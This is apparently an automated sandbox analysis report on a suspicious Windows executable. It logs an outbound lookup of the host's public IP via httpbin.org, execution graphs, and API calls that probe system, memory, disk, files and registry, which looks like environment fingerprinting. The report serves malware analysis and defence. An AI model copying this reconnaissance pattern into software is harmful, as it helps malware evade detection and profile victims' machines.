                                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.84970434.226.108.1554435340C:\Users\user\Desktop\oJkvQZYkrx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-20 15:49:43 UTC52OUTGET /ip HTTP/1.1
                                                        Host: httpbin.org
                                                        Accept: */*
                                                        2024-12-20 15:49:44 UTC224INHTTP/1.1 200 OK
                                                        Date: Fri, 20 Dec 2024 15:49:44 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 31
                                                        Connection: close
                                                        Server: gunicorn/19.9.0
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: true
                                                        2024-12-20 15:49:44 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                        Data Ascii: { "origin": "8.46.123.189"}


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:10:49:37
                                                        Start date:20/12/2024
                                                        Path:C:\Users\user\Desktop\oJkvQZYkrx.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\oJkvQZYkrx.exe"
                                                        Imagebase:0x850000
                                                        File size:4'455'936 bytes
                                                        MD5 hash:8664A5A6E958F985735B8A17171550BC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:2%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:14%
                                                          Total number of Nodes:563
                                                          Total number of Limit Nodes:96
                                                          execution_graph 78183 86d5e0 78184 86d652 WSAStartup 78183->78184 78185 86d5f0 78183->78185 78184->78185 78187 86d664 78184->78187 78188 86d67c 78185->78188 78190 86d690 _open 78185->78190 78189 86d5fa 78190->78189 77697 88b3c0 77698 88b3cb 77697->77698 77699 88b3ee 77697->77699 77703 8576a0 77698->77703 77714 889290 77698->77714 77700 88b3ea 77704 8576e6 send 77703->77704 77705 8576c0 77703->77705 77706 8576d3 77704->77706 77713 857704 77704->77713 77705->77704 77707 8576c9 77705->77707 77728 8572a0 _open 77706->77728 77707->77706 77709 85770b 77707->77709 77729 8572a0 _open 77709->77729 77711 85771c 77730 85cb20 _open 77711->77730 77713->77700 77715 8576a0 2 API calls 77714->77715 77716 8892e5 77715->77716 77717 8893c3 77716->77717 77719 8892f3 77716->77719 77722 889392 77717->77722 77731 86d090 _open 77717->77731 77718 8893be 77718->77700 77719->77722 77723 889335 WSAIoctl 77719->77723 77721 8893f7 77732 894f40 _open 77721->77732 77722->77718 77733 8950a0 _open 77722->77733 77723->77722 77726 889366 77723->77726 77726->77722 77727 889371 setsockopt 77726->77727 77727->77722 77728->77713 77729->77711 77730->77713 77731->77721 77732->77722 77733->77718 77734 88e400 77735 88e412 77734->77735 77743 88e459 77734->77743 77738 88e422 77735->77738 77758 8a3030 _open 77735->77758 77759 8b09d0 _open 77738->77759 77739 88e42b 77760 8868b0 6 API calls 77739->77760 77740 88e4a8 77742 88e495 77742->77740 77745 88b5a0 _open 77742->77745 77743->77740 77743->77742 77746 88b5a0 77743->77746 77745->77740 77747 88b5c0 77746->77747 77750 88b5d2 77746->77750 77748 88b713 77747->77748 77747->77750 77752 88b626 77747->77752 77762 894f40 _open 77748->77762 77750->77742 77751 88b65a 77751->77750 77753 88b72b 77751->77753 77754 88b737 77751->77754 77752->77750 77752->77751 77752->77753 77752->77754 77761 8950a0 _open 77752->77761 77753->77750 77763 8950a0 _open 77753->77763 77754->77750 77764 8950a0 _open 77754->77764 77758->77738 77759->77739 77760->77743 77761->77752 77762->77750 77763->77750 77764->77750 77765 88b400 77766 88b40b 77765->77766 77767 88b425 77765->77767 77770 857770 77766->77770 77768 88b421 77771 8577b6 recv 77770->77771 77772 857790 77770->77772 77774 8577a3 77771->77774 77780 8577d4 77771->77780 77772->77771 77773 857799 77772->77773 77773->77774 77775 8577db 77773->77775 77781 8572a0 _open 77774->77781 77782 8572a0 _open 77775->77782 77778 8577ec 77783 85cb20 _open 77778->77783 77780->77768 77781->77780 77782->77778 77783->77780 77784 88f100 77787 88f11f 77784->77787 77811 88f1b8 77784->77811 77785 88ff1a 77834 890c80 _open 77785->77834 77788 88f2a3 77787->77788 77802 88f240 77787->77802 77809 88f603 77787->77809 77787->77811 77819 894f40 _open 77788->77819 77790 890045 77793 89010d 77790->77793 77796 89004d 77790->77796 77790->77811 77837 8950a0 _open 77790->77837 77791 88f80d 77795 89015e 77793->77795 77838 8950a0 _open 77793->77838 77794 89008a 77836 894f40 _open 77794->77836 77795->77796 77839 8950a0 _open 77795->77839 77840 894f40 _open 77796->77840 77802->77811 77820 857310 77802->77820 77804 88f491 77808 857310 _open 77804->77808 77804->77809 77806 88ff5b 77806->77811 77835 8950a0 _open 77806->77835 77812 88f50d 77808->77812 77809->77785 77809->77790 77809->77791 77809->77794 77814 890d30 _open 77809->77814 77818 8950a0 _open 77809->77818 77832 85fa50 _open 77809->77832 77833 894fd0 _open 77809->77833 77810 88f3ce 77810->77804 77810->77811 77829 8950a0 _open 77810->77829 77812->77811 77815 88f5b9 77812->77815 77830 8950a0 _open 77812->77830 77814->77809 77831 85fa50 _open 77815->77831 77818->77809 77819->77811 77821 857320 77820->77821 77822 857332 77820->77822 77821->77822 77823 857390 77821->77823 77825 857380 77822->77825 77841 8572a0 _open 77822->77841 77842 8572a0 _open 77823->77842 77825->77810 77826 8573a1 77843 85cb20 _open 77826->77843 77829->77804 77830->77815 77831->77809 77832->77809 77833->77809 77834->77806 77835->77811 77836->77811 77837->77793 77838->77795 77839->77796 77840->77811 77841->77825 77842->77826 77843->77825 77844 890700 77847 890719 77844->77847 77858 89099d 77844->77858 77846 857310 _open 77846->77847 77847->77846 77848 8909f6 77847->77848 77850 8909b5 77847->77850 77852 890a35 77847->77852 77847->77858 77862 88b8e0 _open 77847->77862 77863 8bf570 _open 77847->77863 77864 87eb30 _open 77847->77864 77865 8b13a0 _open 77847->77865 77866 8d39a0 _open 77847->77866 77867 87eae0 _open 77847->77867 77869 8575a0 77848->77869 77850->77858 77868 8950a0 _open 77850->77868 77873 894f40 _open 77852->77873 77860 8575a0 _open 77860->77858 77862->77847 77863->77847 77864->77847 77865->77847 77866->77847 77867->77847 77868->77858 77870 8575aa 77869->77870 77872 8575d1 77869->77872 77870->77872 77874 8572a0 _open 77870->77874 77872->77860 77873->77858 77874->77872 77875 8513c9 77879 851160 77875->77879 77878 8513a1 77879->77878 77880 bd93e0 77879->77880 77890 bd8a20 _open islower islower _lock 77879->77890 77887 bd9400 77880->77887 77889 bd93f3 77880->77889 77881 bd9688 77882 bd96c7 77881->77882 77881->77889 77891 bd9280 vfprintf 77881->77891 77892 bd9220 vfprintf 77882->77892 77885 bd96df 77885->77879 77886 bd9280 vfprintf 77886->77887 77887->77881 77887->77882 77887->77886 77888 bd9220 vfprintf 77887->77888 77887->77889 77888->77887 77889->77879 77890->77879 77891->77881 77892->77885 77893 903c00 77894 903c23 77893->77894 77896 903c0d 77893->77896 77894->77896 77897 91b180 77894->77897 77898 91b2e3 77897->77898 77900 91b19b 77897->77900 77898->77896 77900->77898 77902 91b2a9 getsockname 77900->77902 77903 91b020 closesocket 77900->77903 77905 91af30 77900->77905 77909 91b060 77900->77909 77914 91b020 77902->77914 77903->77900 77906 91af63 socket 77905->77906 77907 91af4c 77905->77907 77906->77900 77907->77906 77908 91af52 77907->77908 77908->77900 77912 91b080 77909->77912 77910 91b0b0 connect 77911 91b0bf WSAGetLastError 77910->77911 77911->77912 77913 91b0ea 77911->77913 77912->77910 77912->77911 77912->77913 77913->77900 77915 91b052 77914->77915 77916 91b029 77914->77916 77915->77900 77917 91b04b closesocket 77916->77917 77918 91b03e 77916->77918 77917->77915 77918->77900 78191 904720 78195 904728 78191->78195 78192 904733 78194 904774 78195->78192 78202 90476c 78195->78202 78203 905540 socket ioctlsocket connect getsockname closesocket 78195->78203 78197 90482e 78197->78202 78204 909270 78197->78204 78199 904860 78209 904950 78199->78209 78201 904878 78202->78201 78215 9030a0 socket ioctlsocket connect getsockname closesocket 78202->78215 78203->78197 78216 90a440 78204->78216 78206 909297 78208 9092ab 78206->78208 78244 90bbe0 socket ioctlsocket connect getsockname closesocket 78206->78244 78208->78199 78211 904966 78209->78211 78210 9049c5 78210->78202 78211->78210 78214 9049b9 78211->78214 78245 90bbe0 socket ioctlsocket connect getsockname closesocket 78211->78245 78212 904aa0 gethostname 78212->78210 78212->78214 78214->78210 78214->78212 78215->78194 78217 90a46b 78216->78217 78218 90aa03 RegOpenKeyExA 78217->78218 78231 90ad14 78217->78231 78219 90ab70 RegOpenKeyExA 78218->78219 78220 90aa27 RegQueryValueExA 78218->78220 78223 90ab90 78219->78223 78224 90ac34 RegOpenKeyExA 78219->78224 78221 90aa71 78220->78221 78222 90aacc RegQueryValueExA 78220->78222 78221->78222 78230 90aa85 RegQueryValueExA 78221->78230 78226 90ab66 RegCloseKey 78222->78226 78227 90ab0e 78222->78227 78223->78224 78225 90acf8 RegOpenKeyExA 78224->78225 78240 90ac54 78224->78240 78228 90ad56 RegEnumKeyExA 78225->78228 78225->78231 78226->78219 78227->78226 78234 90ab1e RegQueryValueExA 78227->78234 78229 90ad9b 78228->78229 78228->78231 78232 90ae16 RegOpenKeyExA 78229->78232 78233 90aab3 78230->78233 78231->78206 78235 90ae34 RegQueryValueExA 78232->78235 78236 90addf RegEnumKeyExA 78232->78236 78233->78222 78237 90ab4c 78234->78237 78238 90af43 RegQueryValueExA 78235->78238 78243 90adaa 78235->78243 78236->78231 78236->78232 78237->78226 78239 90b052 RegQueryValueExA 78238->78239 78238->78243 78241 90adc7 RegCloseKey 78239->78241 78239->78243 78240->78225 78241->78236 78242 90afa0 RegQueryValueExA 78242->78243 78243->78238 78243->78239 78243->78241 78243->78242 78244->78208 78245->78214 77919 91a080 77922 919740 77919->77922 77921 91a09b 77923 919780 77922->77923 77927 91975d 77922->77927 77924 919925 RegOpenKeyExA 77923->77924 77923->77927 77925 91995a RegQueryValueExA 77924->77925 77924->77927 77926 919986 RegCloseKey 77925->77926 77926->77927 77927->77921 77928 8531d7 77929 8531f4 77928->77929 77930 853200 77929->77930 77934 853223 77929->77934 77935 8515b0 _lock 77930->77935 77932 85321e 77933 8532dc CloseHandle 77933->77932 77934->77933 77935->77932 77936 852f17 77937 852f2c 77936->77937 77938 8531d3 77937->77938 77939 852fb3 RegOpenKeyExA 77937->77939 77940 85315c RegEnumKeyExA 77937->77940 77942 853046 RegOpenKeyExA 77937->77942 77944 85313b RegCloseKey 77937->77944 77939->77937 77940->77937 77941 8531b2 RegCloseKey 77940->77941 77941->77937 77942->77937 77943 853089 RegQueryValueExA 77942->77943 77943->77937 77943->77944 77944->77937 77945 85255d 77959 bd9f70 77945->77959 77948 852589 77949 8525a0 GlobalMemoryStatusEx 77948->77949 77953 8525ec 77949->77953 77950 85263c GetDriveTypeA 77952 852655 GetDiskFreeSpaceExA 77950->77952 77950->77953 77951 852762 77954 8527d6 KiUserCallbackDispatcher 77951->77954 77952->77953 77953->77950 77953->77951 77955 8527f8 77954->77955 77956 8528d9 FindFirstFileW 77955->77956 77957 852906 FindNextFileW 77956->77957 77958 852928 77956->77958 77957->77957 77957->77958 77960 85256c GetSystemInfo 77959->77960 77960->77948 77961 888b50 77962 888b6b 77961->77962 77990 888be6 77961->77990 77963 888b8f 77962->77963 77964 888bf3 77962->77964 77962->77990 78065 866e40 select __WSAFDIsSet __WSAFDIsSet __WSAFDIsSet 77963->78065 77994 88a550 77964->77994 77968 888cd9 SleepEx 77979 888d14 77968->77979 77969 888e85 77973 888eae 77969->77973 77969->77990 78071 862a00 _open 77969->78071 77970 888c1f connect 77971 888c35 77970->77971 78053 88a150 77971->78053 77972 88a150 2 API calls 77982 888dff 77972->77982 77973->77990 78072 8578b0 closesocket 77973->78072 77974 888cb2 77974->77969 77974->77972 77974->77990 77978 888bb5 77978->77990 78067 8950a0 _open 77978->78067 77979->77974 77980 888d43 77979->77980 77986 88a150 2 API calls 77980->77986 77981 888c8b 77984 888dc8 77981->77984 77985 888ba1 77981->77985 77982->77969 78069 86d090 _open 77982->78069 78068 88b100 _open 77984->78068 77985->77968 77985->77974 77985->77978 77986->77978 77988 888e67 78070 894fd0 _open 77988->78070 77995 88a575 77994->77995 77998 88a597 77995->77998 78076 8575e0 77995->78076 77997 88a6d9 78000 88a709 77997->78000 78024 88a713 77997->78024 78100 862a00 _open 77997->78100 77998->77997 78088 88ef30 77998->78088 78003 8578b0 2 API calls 78000->78003 78000->78024 78003->78024 78004 888bfc 78004->77970 78004->77971 78004->77974 78004->77990 78005 88a7e5 78009 88a811 setsockopt 78005->78009 78012 88a87c 78005->78012 78025 88a8ee 78005->78025 78007 88a641 78007->78005 78102 894fd0 _open 78007->78102 78009->78012 78017 88a83b 78009->78017 78010 88a69b 78098 86d090 _open 78010->78098 78012->78025 78105 88b1e0 _open 78012->78105 78013 88a6c9 78099 894f40 _open 78013->78099 78017->78012 78103 86d090 _open 78017->78103 78018 88af56 78018->77997 78020 88af5d 78018->78020 78023 88a150 2 API calls 78020->78023 78020->78024 78021 88a86d 78104 894fd0 _open 78021->78104 78023->78024 78024->78004 78101 8950a0 _open 78024->78101 78025->77997 78026 88acb8 78025->78026 78027 88ae32 78025->78027 78029 88abb9 78025->78029 78032 88abe1 78025->78032 78036 88af33 78025->78036 78026->77997 78026->78029 78043 88acdc 78026->78043 78027->78029 78113 894fd0 _open 78027->78113 78028 88b056 78116 86d090 _open 78028->78116 78029->78032 78033 88ad45 78029->78033 78035 88ade6 78029->78035 78107 886be0 14 API calls 78029->78107 78030 88af03 78030->78036 78114 894fd0 _open 78030->78114 78032->77997 78032->78028 78032->78030 78115 894fd0 _open 78032->78115 78034 88ad5f 78033->78034 78033->78035 78108 8a20d0 _open 78034->78108 78111 86d090 _open 78035->78111 78097 8b67e0 ioctlsocket 78036->78097 78042 88b07b 78117 894f40 _open 78042->78117 78106 86d090 _open 78043->78106 78045 88adb7 78110 8a3030 _open 78045->78110 78046 88ad7b 78046->78045 78109 894fd0 _open 78046->78109 78049 88ad01 78112 894f40 _open 78049->78112 78054 88a15f 78053->78054 78055 888c4d 78053->78055 78054->78055 78056 88a181 getsockname 78054->78056 78055->77981 78066 8950a0 _open 78055->78066 78057 88a1d0 78056->78057 78058 88a1f7 78056->78058 78124 86d090 _open 78057->78124 78059 88ef30 _open 78058->78059 78063 88a20f 78059->78063 78061 88a1eb 78126 894f40 _open 78061->78126 78063->78055 78125 86d090 _open 78063->78125 78065->77985 78066->77981 78067->77990 78068->77974 78069->77988 78070->77969 78071->77973 78073 8578c5 78072->78073 78074 8578d7 78072->78074 78127 8572a0 _open 78073->78127 78074->77990 78077 857607 socket 78076->78077 78078 8575ef 78076->78078 78079 85763a 78077->78079 78080 85762b 78077->78080 78078->78077 78081 857601 78078->78081 78082 857643 78078->78082 78079->77998 78118 8572a0 _open 78080->78118 78081->78077 78119 8572a0 _open 78082->78119 78085 857654 78120 85cb20 _open 78085->78120 78087 857674 78087->77998 78089 88ef47 78088->78089 78090 88efa8 78088->78090 78091 88ef4c 78089->78091 78092 88ef81 78089->78092 78096 88a63a 78090->78096 78123 85c960 _open 78090->78123 78091->78096 78121 8b3d10 _open 78091->78121 78122 8b3d10 _open 78092->78122 78096->78007 78096->78010 78097->78018 78098->78013 78099->77997 78100->78000 78101->78004 78102->78005 78103->78021 78104->78012 78105->78025 78106->78049 78107->78033 78108->78046 78109->78045 78110->78032 78111->78049 78112->77997 78113->78029 78114->78036 78115->78032 78116->78042 78117->77997 78118->78079 78119->78085 78120->78087 78121->78096 78122->78096 78123->78096 78124->78061 78125->78061 78126->78055 78127->78074 78246 8895b0 78247 8895c8 78246->78247 78249 8895fd 78246->78249 78248 88a150 2 API calls 78247->78248 78247->78249 78248->78249 78250 886ab0 78251 886ad5 78250->78251 78252 886bb4 78251->78252 78254 866fa0 4 API calls 78251->78254 78253 905ed0 9 API calls 78252->78253 78255 886ba9 78253->78255 78256 886b54 78254->78256 78256->78252 78256->78255 78257 886b5d 78256->78257 78257->78255 78259 905ed0 78257->78259 78262 905a50 78259->78262 78261 905ee5 78261->78257 78263 905a58 78262->78263 78268 905ea0 78262->78268 78264 905b50 78263->78264 78267 905b88 78263->78267 78277 905a99 78263->78277 78264->78267 78269 905eb4 78264->78269 78270 905b7a 78264->78270 78265 905e96 78297 919480 socket ioctlsocket connect getsockname closesocket 78265->78297 78273 905cae 78267->78273 78295 905ef0 socket ioctlsocket connect getsockname 78267->78295 78268->78261 78298 906f10 socket ioctlsocket connect getsockname closesocket 78269->78298 78287 9070a0 78270->78287 78273->78265 78278 905da1 __WSAFDIsSet 78273->78278 78283 91a920 78273->78283 78296 919320 socket ioctlsocket connect getsockname closesocket 78273->78296 78275 905ec2 78275->78275 78276 905be2 __WSAFDIsSet 78276->78277 78277->78267 78277->78276 78280 9070a0 6 API calls 78277->78280 78294 906f10 socket ioctlsocket connect getsockname closesocket 78277->78294 78278->78273 78280->78277 78285 91a944 78283->78285 78284 91a94b 78284->78273 78285->78284 78286 91a977 send 78285->78286 78286->78273 78288 9070ae 78287->78288 78290 90717f 78288->78290 78293 9071a7 78288->78293 78299 91a8c0 78288->78299 78303 9071c0 socket ioctlsocket connect getsockname 78288->78303 78290->78293 78304 919320 socket ioctlsocket connect getsockname closesocket 78290->78304 78293->78267 78294->78277 78295->78267 78296->78273 78297->78268 78298->78275 78300 91a903 recvfrom 78299->78300 78301 91a8e6 78299->78301 78302 91a8ed 78300->78302 78301->78300 78301->78302 78302->78288 78303->78288 78304->78293 78305 c8d270 78330 bddd30 78305->78330 78307 c8d29a 78308 c8d2a6 78307->78308 78333 bd8f70 78307->78333 78313 c8d2e6 78314 bd8f70 _open 78315 c8d2ef 78314->78315 78344 c8d490 78315->78344 78317 c8d30f 78324 c8d31e 78317->78324 78355 be7e00 78317->78355 78319 c8d36d 78320 bd8f70 _open 78321 c8d402 78320->78321 78360 c94910 _open 78321->78360 78323 c8d43a 78325 c94780 _open 78323->78325 78324->78319 78324->78320 78326 c8d456 78325->78326 78327 c8d47e 78326->78327 78328 bd8f70 _open 78326->78328 78329 c8d48c 78328->78329 78361 be7410 78330->78361 78332 bddd41 78332->78307 78365 bd8e90 _open 78333->78365 78335 bd8f82 78336 bd8e90 _open 78335->78336 78337 bd8fa2 78336->78337 78338 bd8f70 _open 78337->78338 78339 bd8fb8 78338->78339 78340 be12a0 78339->78340 78341 be12ac 78340->78341 78367 bde030 78341->78367 78343 be12da 78343->78313 78343->78314 78348 c8d4da 78344->78348 78345 c8d4f3 78345->78317 78346 bd8f70 _open 78347 c8d536 78346->78347 78349 c8d5e0 78347->78349 78351 c8d596 78347->78351 78348->78345 78348->78346 78372 bdb4e0 _lock 78349->78372 78352 c8d5d4 78351->78352 78373 bdb4e0 _lock 78351->78373 78352->78317 78353 c8d609 78353->78317 78356 be7e1e 78355->78356 78357 be7eec 78356->78357 78358 bd8f70 _open 78356->78358 78357->78324 78359 be7efb 78358->78359 78363 be7424 78361->78363 78362 be7438 78362->78332 78363->78362 78364 be745c _lock 78363->78364 78364->78332 78366 bd8eba 78365->78366 78366->78335 78369 bde07d 78367->78369 78368 bde16e 78368->78343 78369->78368 78371 bdb180 islower islower 78369->78371 78371->78369 78372->78353 78373->78353 78374 8529ff FindFirstFileA 78375 852a31 78374->78375 78376 852a5c RegOpenKeyExA 78375->78376 78377 852a93 78376->78377 78378 852ade CharUpperA 78377->78378 78379 852b0a 78378->78379 78380 852bf9 QueryFullProcessImageNameA 78379->78380 78381 852c3b CloseHandle 78380->78381 78383 852c64 78381->78383 78382 852df1 CloseHandle 78384 852e23 78382->78384 78383->78382 78128 853d5e 78133 853d30 78128->78133 78129 853d90 78137 85fcb0 10 API calls 78129->78137 78132 853dc1 78133->78128 78133->78129 78134 860ab0 78133->78134 78138 8605b0 78134->78138 78137->78132 78139 8607c7 78138->78139 78147 8605bd 78138->78147 78139->78133 78140 86066a 78157 88dec0 78140->78157 78144 86067b 78150 8606f0 78144->78150 78153 8607ce 78144->78153 78164 8673b0 _open 78144->78164 78147->78139 78147->78140 78147->78153 78162 8603c0 _open 78147->78162 78163 867450 _open 78147->78163 78148 860707 WSAEventSelect 78148->78150 78148->78153 78149 8607ef 78149->78153 78155 860847 78149->78155 78166 866fa0 78149->78166 78150->78148 78150->78149 78152 8576a0 2 API calls 78150->78152 78152->78150 78165 867380 _open 78153->78165 78154 8609e8 WSAEnumNetworkEvents 78154->78155 78156 8609d0 WSAEventSelect 78154->78156 78155->78153 78155->78154 78155->78156 78156->78154 78156->78155 78158 88df1e 78157->78158 78159 88dece 78157->78159 78174 88df30 78159->78174 78161 88def9 78161->78144 78162->78147 78163->78147 78164->78144 78165->78139 78167 866feb 78166->78167 78168 866fd4 78166->78168 78167->78155 78168->78167 78169 867207 select 78168->78169 78169->78167 78173 867233 78169->78173 78170 86726b __WSAFDIsSet 78171 86729a __WSAFDIsSet 78170->78171 78170->78173 78172 8672ba __WSAFDIsSet 78171->78172 78171->78173 78172->78173 78173->78167 78173->78170 78173->78171 78173->78172 78175 88df44 78174->78175 78177 88dfb9 78175->78177 78179 88dfb5 78175->78179 78180 867450 _open 78175->78180 78181 867380 _open 78177->78181 78179->78161 78180->78175 78181->78179 78182 bdb160 Sleep 78385 861139 78410 88baa0 78385->78410 78387 861148 78388 861512 78387->78388 78393 861161 78387->78393 78395 861527 78388->78395 78416 85fec0 10 API calls 78388->78416 78390 861fb0 78399 860f00 78390->78399 78420 864940 _open 78390->78420 78391 861f58 78418 860150 _open 78391->78418 78392 860f69 78392->78390 78392->78391 78392->78399 78393->78392 78415 860150 _open 78393->78415 78395->78392 78417 8622d0 10 API calls 78395->78417 78403 860f21 78399->78403 78414 860150 _open 78399->78414 78400 861f61 78402 861fa6 78400->78402 78419 88d4d0 6 API calls 78400->78419 78402->78399 78402->78403 78404 8575a0 _open 78402->78404 78409 86208a 78402->78409 78406 862057 78404->78406 78408 8575a0 _open 78406->78408 78408->78409 78421 863900 _open 78409->78421 78411 88bb60 78410->78411 78413 88bac7 78410->78413 78411->78387 78413->78411 78422 8705b0 _open 78413->78422 78414->78403 78415->78392 78416->78395 78417->78392 78418->78400 78419->78402 78420->78402 78421->78399 78422->78411

                                                          Executed Functions

                                                          Function 0088F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                          • API String ID: 0-1590685507
                                                          • Opcode ID: 9d3a87de1230d6ff09bc3283da390157ff26d12bb97e5bb2e61d923a987db59a
                                                          • Instruction ID: 6619a0063d13fc3d881141397fef0f0b6705ed86103e48777f2e147e10fed0b2
                                                          • Opcode Fuzzy Hash: 9d3a87de1230d6ff09bc3283da390157ff26d12bb97e5bb2e61d923a987db59a
                                                          • Instruction Fuzzy Hash: EEC2AF31A047449FDB14EF29C484B6AB7E1FF84318F09866DED98DB262D771E984CB81
                                                          Function 0085255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSystemInfo.KERNELBASE ref: 00852579
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 008525CC
                                                          • GetDriveTypeA.KERNELBASE ref: 00852647
                                                          • GetDiskFreeSpaceExA.KERNELBASE ref: 0085267E
                                                          • KiUserCallbackDispatcher.NTDLL ref: 008527E2
                                                          • FindFirstFileW.KERNELBASE ref: 008528F8
                                                          • FindNextFileW.KERNELBASE ref: 0085291F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                          • String ID: @$`
                                                          • API String ID: 3271271169-3318628307
                                                          • Opcode ID: 47b90159b71b92e511e72a4424f17bcb45f92a2a3f5b8475e54e60fd3a6cb810
                                                          • Instruction ID: 6de783602555ae63bf08f5beeb5f1ef7d8cd847849598096104b3d43afd9f43f
                                                          • Opcode Fuzzy Hash: 47b90159b71b92e511e72a4424f17bcb45f92a2a3f5b8475e54e60fd3a6cb810
                                                          • Instruction Fuzzy Hash: 2BD1A4B49053099FCB00EF68C98569EBBF0FF48354F0089ADE898E7350E7749A859F52
                                                          Function 008529FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
